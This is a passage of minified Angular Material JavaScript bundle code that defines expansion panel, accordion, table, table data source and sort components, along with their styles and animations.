expanded(e){e=wi(e),this._expanded!==e&&(this._expanded=e,this.expandedChange.emit(e),e?(this.opened.emit(),this._expansionDispatcher.notify(this.id,this.accordion?this.accordion.id:this.id)):this.closed.emit(),this._changeDetectorRef.markForCheck())}get disabled(){return this._disabled}set disabled(e){this._disabled=wi(e)}ngOnDestroy(){this.opened.complete(),this.closed.complete(),this.destroyed.emit(),this.destroyed.complete(),this._removeUniqueSelectionListener(),this._openCloseAllSubscription.unsubscribe()}toggle(){this.disabled||(this.expanded=!this.expanded)}close(){this.disabled||(this.expanded=!1)}open(){this.disabled||(this.expanded=!0)}_subscribeToOpenCloseAllActions(){return this.accordion._openCloseAllActions.subscribe(e=>{this.disabled||(this.expanded=e)})}}return t.\u0275fac=function(e){return new(e||t)(Ee(A8,12),Ee(Ma),Ee(aw))},t.\u0275dir=Ot({type:t,selectors:[["cdk-accordion-item"],["","cdkAccordionItem",""]],inputs:{expanded:"expanded",disabled:"disabled"},outputs:{closed:"closed",opened:"opened",destroyed:"destroyed",expandedChange:"expandedChange"},exportAs:["cdkAccordionItem"],features:[ki([{provide:A8,useValue:void 0}])]}),t})(),q2e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();const G2e=["body"];function j2e(t,a){}const Q2e=[[["mat-expansion-panel-header"]],"*",[["mat-action-row"]]],$2e=["mat-expansion-panel-header","*","mat-action-row"];function K2e(t,a){1&t&&it(0,"span",2),2&t&&V("@indicatorRotate",B()._getExpandedState())}const X2e=[[["mat-panel-title"]],[["mat-panel-description"]],"*"],Y2e=["mat-panel-title","mat-panel-description","*"],T8=new ni("MAT_ACCORDION"),wV="225ms cubic-bezier(0.4,0.0,0.2,1)",IV={indicatorRotate:ar("indicatorRotate",[sn("collapsed, void",zi({transform:"rotate(0deg)"})),sn("expanded",zi({transform:"rotate(180deg)"})),gn("expanded <=> collapsed, void => collapsed",En(wV))]),bodyExpansion:ar("bodyExpansion",[sn("collapsed, void",zi({height:"0px",visibility:"hidden"})),sn("expanded",zi({height:"*",visibility:"visible"})),gn("expanded <=> collapsed, void => collapsed",En(wV))])},RV=new ni("MAT_EXPANSION_PANEL");let Cp=(()=>{class t{constructor(e,i){this._template=e,this._expansionPanel=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(RV,8))},t.\u0275dir=Ot({type:t,selectors:[["ng-template","matExpansionPanelContent",""]]}),t})(),J2e=0;const SV=new ni("MAT_EXPANSION_PANEL_DEFAULT_OPTIONS");let Ec=(()=>{class t extends U2e{constructor(e,i,n,r,c,d,T){super(e,i,n),this._viewContainerRef=r,this._animationMode=d,this._hideToggle=!1,this.afterExpand=new Tt,this.afterCollapse=new Tt,this._inputChanges=new J,this._headerId="mat-expansion-panel-header-"+J2e++,this._bodyAnimationDone=new J,this.accordion=e,this._document=c,this._bodyAnimationDone.pipe(Bh((k,q)=>k.fromState===q.fromState&&k.toState===q.toState)).subscribe(k=>{"void"!==k.fromState&&("expanded"===k.toState?this.afterExpand.emit():"collapsed"===k.toState&&this.afterCollapse.emit())}),T&&(this.hideToggle=T.hideToggle)}get hideToggle(){return this._hideToggle||this.accordion&&this.accordion.hideToggle}set hideToggle(e){this._hideToggle=wi(e)}get togglePosition(){return this._togglePosition||this.accordion&&this.accordion.togglePosition}set togglePosition(e){this._togglePosition=e}_hasSpacing(){return!!this.accordion&&this.expanded&&"default"===this.accordion.displayMode}_getExpandedState(){return this.expanded?"expanded":"collapsed"}toggle(){this.expanded=!this.expanded}close(){this.expanded=!1}open(){this.expanded=!0}ngAfterContentInit(){this._lazyContent&&this._lazyContent._expansionPanel===this&&this.opened.pipe(Ro(null),Dn(()=>this.expanded&&!this._portal),Cn(1)).subscribe(()=>{this._portal=new Mm(this._lazyContent._template,this._viewContainerRef)})}ngOnChanges(e){this._inputChanges.next(e)}ngOnDestroy(){super.ngOnDestroy(),this._bodyAnimationDone.complete(),this._inputChanges.complete()}_containsFocus(){if(this._body){const e=this._document.activeElement,i=this._body.nativeElement;return e===i||i.contains(e)}return!1}}return t.\u0275fac=function(e){return new(e||t)(Ee(T8,12),Ee(Ma),Ee(aw),Ee(fo),Ee(ga),Ee(ir,8),Ee(SV,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-expansion-panel"]],contentQueries:function(e,i,n){if(1&e&&ha(n,Cp,5),2&e){let r;Vt(r=Bt())&&(i._lazyContent=r.first)}},viewQuery:function(e,i){if(1&e&&Mi(G2e,5),2&e){let n;Vt(n=Bt())&&(i._body=n.first)}},hostAttrs:[1,"mat-expansion-panel"],hostVars:6,hostBindings:function(e,i){2&e&&Ct("mat-expanded",i.expanded)("_mat-animation-noopable","NoopAnimations"===i._animationMode)("mat-expansion-panel-spacing",i._hasSpacing())},inputs:{disabled:"disabled",expanded:"expanded",hideToggle:"hideToggle",togglePosition:"togglePosition"},outputs:{opened:"opened",closed:"closed",expandedChange:"expandedChange",afterExpand:"afterExpand",afterCollapse:"afterCollapse"},exportAs:["matExpansionPanel"],features:[ki([{provide:T8,useValue:void 0},{provide:RV,useExisting:t}]),ci,sa],ngContentSelectors:$2e,decls:7,vars:4,consts:[["role","region",1,"mat-expansion-panel-content",3,"id"],["body",""],[1,"mat-expansion-panel-body"],[3,"cdkPortalOutlet"]],template:function(e,i){1&e&&(Jn(Q2e),va(0),m(1,"div",0,1),he("@bodyExpansion.done",function(r){return i._bodyAnimationDone.next(r)}),m(3,"div",2),va(4,1),ne(5,j2e,0,0,"ng-template",3),u(),va(6,2),u()),2&e&&(C(1),V("@bodyExpansion",i._getExpandedState())("id",i.id),Rt("aria-labelledby",i._headerId),C(4),V("cdkPortalOutlet",i._portal))},dependencies:[Cu],styles:['.mat-expansion-panel{box-sizing:content-box;display:block;margin:0;border-radius:4px;overflow:hidden;transition:margin 225ms cubic-bezier(0.4, 0, 0.2, 1),box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1);position:relative}.mat-accordion .mat-expansion-panel:not(.mat-expanded),.mat-accordion .mat-expansion-panel:not(.mat-expansion-panel-spacing){border-radius:0}.mat-accordion .mat-expansion-panel:first-of-type{border-top-right-radius:4px;border-top-left-radius:4px}.mat-accordion .mat-expansion-panel:last-of-type{border-bottom-right-radius:4px;border-bottom-left-radius:4px}.cdk-high-contrast-active .mat-expansion-panel{outline:solid 1px}.mat-expansion-panel.ng-animate-disabled,.ng-animate-disabled .mat-expansion-panel,.mat-expansion-panel._mat-animation-noopable{transition:none}.mat-expansion-panel-content{display:flex;flex-direction:column;overflow:visible}.mat-expansion-panel-content[style*="visibility: hidden"] *{visibility:hidden !important}.mat-expansion-panel-body{padding:0 24px 16px}.mat-expansion-panel-spacing{margin:16px 0}.mat-accordion>.mat-expansion-panel-spacing:first-child,.mat-accordion>*:first-child:not(.mat-expansion-panel) .mat-expansion-panel-spacing{margin-top:0}.mat-accordion>.mat-expansion-panel-spacing:last-child,.mat-accordion>*:last-child:not(.mat-expansion-panel) .mat-expansion-panel-spacing{margin-bottom:0}.mat-action-row{border-top-style:solid;border-top-width:1px;display:flex;flex-direction:row;justify-content:flex-end;padding:16px 8px 16px 24px}.mat-action-row .mat-button-base,.mat-action-row .mat-mdc-button-base{margin-left:8px}[dir=rtl] .mat-action-row .mat-button-base,[dir=rtl] .mat-action-row .mat-mdc-button-base{margin-left:0;margin-right:8px}'],encapsulation:2,data:{animation:[IV.bodyExpansion]},changeDetection:0}),t})(),E8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-action-row"]],hostAttrs:[1,"mat-action-row"]}),t})();class Z2e{}const eCe=mp(Z2e);let Dc=(()=>{class t extends eCe{constructor(e,i,n,r,c,d,T){super(),this.panel=e,this._element=i,this._focusMonitor=n,this._changeDetectorRef=r,this._animationMode=d,this._parentChangeSubscription=I.EMPTY;const k=e.accordion?e.accordion._stateChanges.pipe(Dn(q=>!(!q.hideToggle&&!q.togglePosition))):ua;this.tabIndex=parseInt(T||"")||0,this._parentChangeSubscription=ra(e.opened,e.closed,k,e._inputChanges.pipe(Dn(q=>!!(q.hideToggle||q.disabled||q.togglePosition)))).subscribe(()=>this._changeDetectorRef.markForCheck()),e.closed.pipe(Dn(()=>e._containsFocus())).subscribe(()=>n.focusVia(i,"program")),c&&(this.expandedHeight=c.expandedHeight,this.collapsedHeight=c.collapsedHeight)}get disabled(){return this.panel.disabled}_toggle(){this.disabled||this.panel.toggle()}_isExpanded(){return this.panel.expanded}_getExpandedState(){return this.panel._getExpandedState()}_getPanelId(){return this.panel.id}_getTogglePosition(){return this.panel.togglePosition}_showToggle(){return!this.panel.hideToggle&&!this.panel.disabled}_getHeaderHeight(){const e=this._isExpanded();return e&&this.expandedHeight?this.expandedHeight:!e&&this.collapsedHeight?this.collapsedHeight:null}_keydown(e){switch(e.keyCode){case 32:case 13:Zr(e)||(e.preventDefault(),this._toggle());break;default:return void(this.panel.accordion&&this.panel.accordion._handleHeaderKeydown(e))}}focus(e,i){e?this._focusMonitor.focusVia(this._element,e,i):this._element.nativeElement.focus(i)}ngAfterViewInit(){this._focusMonitor.monitor(this._element).subscribe(e=>{e&&this.panel.accordion&&this.panel.accordion._handleHeaderFocus(this)})}ngOnDestroy(){this._parentChangeSubscription.unsubscribe(),this._focusMonitor.stopMonitoring(this._element)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ec,1),Ee(mi),Ee(js),Ee(Ma),Ee(SV,8),Ee(ir,8),Vr("tabindex"))},t.\u0275cmp=Wt({type:t,selectors:[["mat-expansion-panel-header"]],hostAttrs:["role","button",1,"mat-expansion-panel-header","mat-focus-indicator"],hostVars:15,hostBindings:function(e,i){1&e&&he("click",function(){return i._toggle()})("keydown",function(r){return i._keydown(r)}),2&e&&(Rt("id",i.panel._headerId)("tabindex",i.tabIndex)("aria-controls",i._getPanelId())("aria-expanded",i._isExpanded())("aria-disabled",i.panel.disabled),ri("height",i._getHeaderHeight()),Ct("mat-expanded",i._isExpanded())("mat-expansion-toggle-indicator-after","after"===i._getTogglePosition())("mat-expansion-toggle-indicator-before","before"===i._getTogglePosition())("_mat-animation-noopable","NoopAnimations"===i._animationMode))},inputs:{tabIndex:"tabIndex",expandedHeight:"expandedHeight",collapsedHeight:"collapsedHeight"},features:[ci],ngContentSelectors:Y2e,decls:5,vars:3,consts:[[1,"mat-content"],["class","mat-expansion-indicator",4,"ngIf"],[1,"mat-expansion-indicator"]],template:function(e,i){1&e&&(Jn(X2e),m(0,"span",0),va(1),va(2,1),va(3,2),u(),ne(4,K2e,1,1,"span",1)),2&e&&(Ct("mat-content-hide-toggle",!i._showToggle()),C(4),V("ngIf",i._showToggle()))},dependencies:[Ri],styles:['.mat-expansion-panel-header{display:flex;flex-direction:row;align-items:center;padding:0 24px;border-radius:inherit;transition:height 225ms cubic-bezier(0.4, 0, 0.2, 1)}.mat-expansion-panel-header._mat-animation-noopable{transition:none}.mat-expansion-panel-header:focus,.mat-expansion-panel-header:hover{outline:none}.mat-expansion-panel-header.mat-expanded:focus,.mat-expansion-panel-header.mat-expanded:hover{background:inherit}.mat-expansion-panel-header:not([aria-disabled=true]){cursor:pointer}.mat-expansion-panel-header.mat-expansion-toggle-indicator-before{flex-direction:row-reverse}.mat-expansion-panel-header.mat-expansion-toggle-indicator-before .mat-expansion-indicator{margin:0 16px 0 0}[dir=rtl] .mat-expansion-panel-header.mat-expansion-toggle-indicator-before .mat-expansion-indicator{margin:0 0 0 16px}.mat-content{display:flex;flex:1;flex-direction:row;overflow:hidden}.mat-content.mat-content-hide-toggle{margin-right:8px}[dir=rtl] .mat-content.mat-content-hide-toggle{margin-right:0;margin-left:8px}.mat-expansion-toggle-indicator-before .mat-content.mat-content-hide-toggle{margin-left:24px;margin-right:0}[dir=rtl] .mat-expansion-toggle-indicator-before .mat-content.mat-content-hide-toggle{margin-right:24px;margin-left:0}.mat-expansion-panel-header-title,.mat-expansion-panel-header-description{display:flex;flex-grow:1;flex-basis:0;margin-right:16px;align-items:center}[dir=rtl] .mat-expansion-panel-header-title,[dir=rtl] .mat-expansion-panel-header-description{margin-right:0;margin-left:16px}.mat-expansion-panel-header-description{flex-grow:2}.mat-expansion-indicator::after{border-style:solid;border-width:0 2px 2px 0;content:"";display:inline-block;padding:3px;transform:rotate(45deg);vertical-align:middle}.cdk-high-contrast-active .mat-expansion-panel-content{border-top:1px solid;border-top-left-radius:0;border-top-right-radius:0}'],encapsulation:2,data:{animation:[IV.indicatorRotate]},changeDetection:0}),t})(),Il=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-panel-description"]],hostAttrs:[1,"mat-expansion-panel-header-description"]}),t})(),el=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-panel-title"]],hostAttrs:[1,"mat-expansion-panel-header-title"]}),t})(),tl=(()=>{class t extends B2e{constructor(){super(...arguments),this._ownHeaders=new gd,this._hideToggle=!1,this.displayMode="default",this.togglePosition="after"}get hideToggle(){return this._hideToggle}set hideToggle(e){this._hideToggle=wi(e)}ngAfterContentInit(){this._headers.changes.pipe(Ro(this._headers)).subscribe(e=>{this._ownHeaders.reset(e.filter(i=>i.panel.accordion===this)),this._ownHeaders.notifyOnChanges()}),this._keyManager=new L1(this._ownHeaders).withWrap().withHomeAndEnd()}_handleHeaderKeydown(e){this._keyManager.onKeydown(e)}_handleHeaderFocus(e){this._keyManager.updateActiveItem(e)}ngOnDestroy(){super.ngOnDestroy(),this._ownHeaders.destroy()}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["mat-accordion"]],contentQueries:function(e,i,n){if(1&e&&ha(n,Dc,5),2&e){let r;Vt(r=Bt())&&(i._headers=r)}},hostAttrs:[1,"mat-accordion"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("mat-accordion-multi",i.multi)},inputs:{multi:"multi",hideToggle:"hideToggle",displayMode:"displayMode",togglePosition:"togglePosition"},exportAs:["matAccordion"],features:[ki([{provide:T8,useExisting:t}]),ci]}),t})(),kV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,la,q2e,yu]}),t})(),dCe=(()=>{class t{constructor(){this.changes=new J,this.calendarLabel="Calendar",this.openCalendarLabel="Open calendar",this.closeCalendarLabel="Close calendar",this.prevMonthLabel="Previous month",this.nextMonthLabel="Next month",this.prevYearLabel="Previous year",this.nextYearLabel="Next year",this.prevMultiYearLabel="Previous 24 years",this.nextMultiYearLabel="Next 24 years",this.switchToMonthViewLabel="Choose date",this.switchToMultiYearViewLabel="Choose month and year",this.startDateLabel="Start date",this.endDateLabel="End date"}formatYearRange(e,i){return`${e} \u2013 ${i}`}formatYearRangeLabel(e,i){return`${e} to ${i}`}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const NV={transformPanel:ar("transformPanel",[gn("void => enter-dropdown",En("120ms cubic-bezier(0, 0, 0.2, 1)",og([zi({opacity:0,transform:"scale(1, 0.8)"}),zi({opacity:1,transform:"scale(1, 1)"})]))),gn("void => enter-dialog",En("150ms cubic-bezier(0, 0, 0.2, 1)",og([zi({opacity:0,transform:"scale(0.7)"}),zi({transform:"none",opacity:1})]))),gn("* => void",En("100ms linear",zi({opacity:0})))]),fadeInCalendar:ar("fadeInCalendar",[sn("void",zi({opacity:0})),sn("enter",zi({opacity:1})),gn("void => *",En("120ms 100ms cubic-bezier(0.55, 0, 0.55, 0.2)"))])},hCe={provide:new ni("mat-datepicker-scroll-strategy"),deps:[vs],useFactory:function uCe(t){return()=>t.scrollStrategies.reposition()}};let zV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[dCe,hCe],imports:[rn,hp,bu,Xy,yu,la,uu]}),t})();const CCe=[[["caption"]],[["colgroup"],["col"]]],yCe=["caption","colgroup, col"];let Au=(()=>{class t extends I3{constructor(){super(...arguments),this.stickyCssClass="mat-table-sticky",this.needsPositionStickyOnElement=!1}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["mat-table"],["table","mat-table",""]],hostAttrs:[1,"mat-table"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("mat-table-fixed-layout",i.fixedLayout)},exportAs:["matTable"],features:[ki([{provide:Ny,useClass:gz},{provide:I3,useExisting:t},{provide:k1,useExisting:t},{provide:gw,useClass:xz},{provide:vw,useValue:null}]),ci],ngContentSelectors:yCe,decls:6,vars:0,consts:[["headerRowOutlet",""],["rowOutlet",""],["noDataRowOutlet",""],["footerRowOutlet",""]],template:function(e,i){1&e&&(Jn(CCe),va(0),va(1,1),Ir(2,0)(3,1)(4,2)(5,3))},dependencies:[E3,D3,x3,w3],styles:["mat-table{display:block}mat-header-row{min-height:56px}mat-row,mat-footer-row{min-height:48px}mat-row,mat-header-row,mat-footer-row{display:flex;border-width:0;border-bottom-width:1px;border-style:solid;align-items:center;box-sizing:border-box}mat-cell:first-of-type,mat-header-cell:first-of-type,mat-footer-cell:first-of-type{padding-left:24px}[dir=rtl] mat-cell:first-of-type:not(:only-of-type),[dir=rtl] mat-header-cell:first-of-type:not(:only-of-type),[dir=rtl] mat-footer-cell:first-of-type:not(:only-of-type){padding-left:0;padding-right:24px}mat-cell:last-of-type,mat-header-cell:last-of-type,mat-footer-cell:last-of-type{padding-right:24px}[dir=rtl] mat-cell:last-of-type:not(:only-of-type),[dir=rtl] mat-header-cell:last-of-type:not(:only-of-type),[dir=rtl] mat-footer-cell:last-of-type:not(:only-of-type){padding-right:0;padding-left:24px}mat-cell,mat-header-cell,mat-footer-cell{flex:1;display:flex;align-items:center;overflow:hidden;word-wrap:break-word;min-height:inherit}table.mat-table{border-spacing:0}tr.mat-header-row{height:56px}tr.mat-row,tr.mat-footer-row{height:48px}th.mat-header-cell{text-align:left}[dir=rtl] th.mat-header-cell{text-align:right}th.mat-header-cell,td.mat-cell,td.mat-footer-cell{padding:0;border-bottom-width:1px;border-bottom-style:solid}th.mat-header-cell:first-of-type,td.mat-cell:first-of-type,td.mat-footer-cell:first-of-type{padding-left:24px}[dir=rtl] th.mat-header-cell:first-of-type:not(:only-of-type),[dir=rtl] td.mat-cell:first-of-type:not(:only-of-type),[dir=rtl] td.mat-footer-cell:first-of-type:not(:only-of-type){padding-left:0;padding-right:24px}th.mat-header-cell:last-of-type,td.mat-cell:last-of-type,td.mat-footer-cell:last-of-type{padding-right:24px}[dir=rtl] th.mat-header-cell:last-of-type:not(:only-of-type),[dir=rtl] td.mat-cell:last-of-type:not(:only-of-type),[dir=rtl] td.mat-footer-cell:last-of-type:not(:only-of-type){padding-right:0;padding-left:24px}.mat-table-sticky{position:sticky !important}.mat-table-fixed-layout{table-layout:fixed}"],encapsulation:2}),t})(),Dm=(()=>{class t extends P1{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","matCellDef",""]],features:[ki([{provide:P1,useExisting:t}]),ci]}),t})(),Tu=(()=>{class t extends O1{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","matHeaderCellDef",""]],features:[ki([{provide:O1,useExisting:t}]),ci]}),t})(),xm=(()=>{class t extends Nh{get name(){return this._name}set name(e){this._setNameInput(e)}_updateColumnCssClassName(){super._updateColumnCssClassName(),this._columnCssClassName.push(`mat-column-${this.cssClassFriendlyName}`)}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","matColumnDef",""]],inputs:{sticky:"sticky",name:["matColumnDef","name"]},features:[ki([{provide:Nh,useExisting:t},{provide:"MAT_SORT_HEADER_COLUMN_DEF",useExisting:t}]),ci]}),t})(),Eu=(()=>{class t extends pw{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["mat-header-cell"],["th","mat-header-cell",""]],hostAttrs:["role","columnheader",1,"mat-header-cell"],features:[ci]}),t})(),wm=(()=>{class t extends _w{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["mat-cell"],["td","mat-cell",""]],hostAttrs:["role","gridcell",1,"mat-cell"],features:[ci]}),t})(),jh=(()=>{class t extends Uy{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","matHeaderRowDef",""]],inputs:{columns:["matHeaderRowDef","columns"],sticky:["matHeaderRowDefSticky","sticky"]},features:[ki([{provide:Uy,useExisting:t}]),ci]}),t})(),Du=(()=>{class t extends A3{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","matRowDef",""]],inputs:{columns:["matRowDefColumns","columns"],when:["matRowDefWhen","when"]},features:[ki([{provide:A3,useExisting:t}]),ci]}),t})(),Qh=(()=>{class t extends yw{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["mat-header-row"],["tr","mat-header-row",""]],hostAttrs:["role","row",1,"mat-header-row"],exportAs:["matHeaderRow"],features:[ki([{provide:yw,useExisting:t}]),ci],decls:1,vars:0,consts:[["cdkCellOutlet",""]],template:function(e,i){1&e&&Ir(0,0)},dependencies:[Lh],encapsulation:2}),t})(),xc=(()=>{class t extends Mw{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["mat-row"],["tr","mat-row",""]],hostAttrs:["role","row",1,"mat-row"],exportAs:["matRow"],features:[ki([{provide:Mw,useExisting:t}]),ci],decls:1,vars:0,consts:[["cdkCellOutlet",""]],template:function(e,i){1&e&&Ir(0,0)},dependencies:[Lh],encapsulation:2}),t})(),yp=(()=>{class t extends T3{constructor(){super(...arguments),this._contentClassName="mat-no-data-row"}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["ng-template","matNoDataRow",""]],features:[ki([{provide:T3,useExisting:t}]),ci]}),t})(),WV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Aw,la,la]}),t})();class ICe extends _z{constructor(a=[]){super(),this._renderData=new zs([]),this._filter=new zs(""),this._internalPageChanges=new J,this._renderChangesSubscription=null,this.sortingDataAccessor=(e,i)=>{const n=e[i];if(pz(n)){const r=Number(n);return r<9007199254740991?r:n}return n},this.sortData=(e,i)=>{const n=i.active,r=i.direction;return n&&""!=r?e.sort((c,d)=>{let T=this.sortingDataAccessor(c,n),k=this.sortingDataAccessor(d,n);const q=typeof T,Y=typeof k;q!==Y&&("number"===q&&(T+=""),"number"===Y&&(k+=""));let te=0;return null!=T&&null!=k?T>k?te=1:T<k&&(te=-1):null!=T?te=1:null!=k&&(te=-1),te*("asc"==r?1:-1)}):e},this.filterPredicate=(e,i)=>{const n=Object.keys(e).reduce((c,d)=>c+e[d]+"\u25ec","").toLowerCase(),r=i.trim().toLowerCase();return-1!=n.indexOf(r)},this._data=new zs(a),this._updateChangeSubscription()}get data(){return this._data.value}set data(a){a=Array.isArray(a)?a:[],this._data.next(a),this._renderChangesSubscription||this._filterData(a)}get filter(){return this._filter.value}set filter(a){this._filter.next(a),this._renderChangesSubscription||this._filterData(this.data)}get sort(){return this._sort}set sort(a){this._sort=a,this._updateChangeSubscription()}get paginator(){return this._paginator}set paginator(a){this._paginator=a,this._updateChangeSubscription()}_updateChangeSubscription(){var a;const e=this._sort?ra(this._sort.sortChange,this._sort.initialized):Bi(null),i=this._paginator?ra(this._paginator.page,this._internalPageChanges,this._paginator.initialized):Bi(null),r=ug([this._data,this._filter]).pipe(Xe(([T])=>this._filterData(T))),c=ug([r,e]).pipe(Xe(([T])=>this._orderData(T))),d=ug([c,i]).pipe(Xe(([T])=>this._pageData(T)));null===(a=this._renderChangesSubscription)||void 0===a||a.unsubscribe(),this._renderChangesSubscription=d.subscribe(T=>this._renderData.next(T))}_filterData(a){return this.filteredData=null==this.filter||""===this.filter?a:a.filter(e=>this.filterPredicate(e,this.filter)),this.paginator&&this._updatePaginator(this.filteredData.length),this.filteredData}_orderData(a){return this.sort?this.sortData(a.slice(),this.sort):a}_pageData(a){if(!this.paginator)return a;const e=this.paginator.pageIndex*this.paginator.pageSize;return a.slice(e,e+this.paginator.pageSize)}_updatePaginator(a){Promise.resolve().then(()=>{const e=this.paginator;if(e&&(e.length=a,e.pageIndex>0)){const i=Math.ceil(e.length/e.pageSize)-1||0,n=Math.min(e.pageIndex,i);n!==e.pageIndex&&(e.pageIndex=n,this._internalPageChanges.next())}})}connect(){return this._renderChangesSubscription||this._updateChangeSubscription(),this._renderData}disconnect(){var a;null===(a=this._renderChangesSubscription)||void 0===a||a.unsubscribe(),this._renderChangesSubscription=null}}class Ld extends ICe{}const RCe=["mat-sort-header",""];function SCe(t,a){if(1&t){const e=Ye();m(0,"div",3),he("@arrowPosition.start",function(){return be(e),Me(B()._disableViewStateAnimation=!0)})("@arrowPosition.done",function(){return be(e),Me(B()._disableViewStateAnimation=!1)}),it(1,"div",4),m(2,"div",5),it(3,"div",6)(4,"div",7)(5,"div",8),u()()}if(2&t){const e=B();V("@arrowOpacity",e._getArrowViewState())("@arrowPosition",e._getArrowViewState())("@allowChildren",e._getArrowDirectionState()),C(2),V("@indicator",e._getArrowDirectionState()),C(1),V("@leftPointer",e._getArrowDirectionState()),C(1),V("@rightPointer",e._getArrowDirectionState())}}const kCe=["*"],FV=new ni("MAT_SORT_DEFAULT_OPTIONS"),PCe=yW(Jc(class{}));let il=(()=>{class t extends PCe{constructor(e){super(),this._defaultOptions=e,this.sortables=new Map,this._stateChanges=new J,this.start="asc",this._direction="",this.sortChange=new Tt}get direction(){return this._direction}set direction(e){this._direction=e}get disableClear(){return this._disableClear}set disableClear(e){this._disableClear=wi(e)}register(e){this.sortables.set(e.id,e)}deregister(e){this.sortables.delete(e.id)}sort(e){this.active!=e.id?(this.active=e.id,this.direction=e.start?e.start:this.start):this.direction=this.getNextSortDirection(e),this.sortChange.emit({active:this.active,direction:this.direction})}getNextSortDirection(e){var i,n,r;if(!e)return"";const c=null!==(n=null!==(i=null==e?void 0:e.disableClear)&&void 0!==i?i:this.disableClear)&&void 0!==n?n:!(null===(r=this._defaultOptions)||void 0===r||!r.disableClear);let d=function OCe(t,a){let e=["asc","desc"];return"desc"==t&&e.reverse(),a||e.push(""),e}(e.start||this.start,c),T=d.indexOf(this.direction)+1;return T>=d.length&&(T=0),d[T]}ngOnInit(){this._markInitialized()}ngOnChanges(){this._stateChanges.next()}ngOnDestroy(){this._stateChanges.complete()}}return t.\u0275fac=function(e){return new(e||t)(Ee(FV,8))},t.\u0275dir=Ot({type:t,selectors:[["","matSort",""]],hostAttrs:[1,"mat-sort"],inputs:{disabled:["matSortDisabled","disabled"],active:["matSortActive","active"],start:["matSortStart","start"],direction:["matSortDirection","direction"],disableClear:["matSortDisableClear","disableClear"]},outputs:{sortChange:"matSortChange"},exportAs:["matSort"],features:[ci,sa]}),t})();const bp=Rpe.ENTERING+" "+Ipe.STANDARD_CURVE,U1={indicator:ar("indicator",[sn("active-asc, asc",zi({transform:"translateY(0px)"})),sn("active-desc, desc",zi({transform:"translateY(10px)"})),gn("active-asc <=> active-desc",En(bp))]),leftPointer:ar("leftPointer",[sn("active-asc, asc",zi({transform:"rotate(-45deg)"})),sn("active-desc, desc",zi({transform:"rotate(45deg)"})),gn("active-asc <=> active-desc",En(bp))]),rightPointer:ar("rightPointer",[sn("active-asc, asc",zi({transform:"rotate(45deg)"})),sn("active-desc, desc",zi({transform:"rotate(-45deg)"})),gn("active-asc <=> active-desc",En(bp))]),arrowOpacity:ar("arrowOpacity",[sn("desc-to-active, asc-to-active, active",zi({opacity:1})),sn("desc-to-hint, asc-to-hint, hint",zi({opacity:.54})),sn("hint-to-desc, active-to-desc, desc, hint-to-asc, active-to-asc, asc, void",zi({opacity:0})),gn("* => asc, * => desc, * => active, * => hint, * => void",En("0ms")),gn("* <=> *",En(bp))]),arrowPosition:ar("arrowPosition",[gn("* => desc-to-hint, * => desc-to-active",En(bp,og([zi({transform:"translateY(-25%)"}),zi({transform:"translateY(0)"})]))),gn("* => hint-to-desc, * => active-to-desc",En(bp,og([zi({transform:"translateY(0)"}),zi({transform:"translateY(25%)"})]))),gn("* => asc-to-hint, * => asc-to-active",En(bp,og([zi({transform:"translateY(25%)"}),zi({transform:"translateY(0)"})]))),gn("* => hint-to-asc, * => active-to-asc",En(bp,og([zi({transform:"translateY(0)"}),zi({transform:"translateY(-25%)"})]))),sn("desc-to-hint, asc-to-hint, hint, desc-to-active, asc-to-active, active",zi({transform:"translateY(0)"})),sn("hint-to-desc, active-to-desc, desc",zi({transform:"translateY(-25%)"})),sn("hint-to-asc, active-to-asc, asc",zi({transform:"translateY(25%)"}))]),allowChildren:ar("allowChildren",[gn("* <=> *",[c4("@*",s4(),{optional:!0})])])};let dA=(()=>{class t{constructor(){this.changes=new J}}return t.\u0275fac=function(e){return 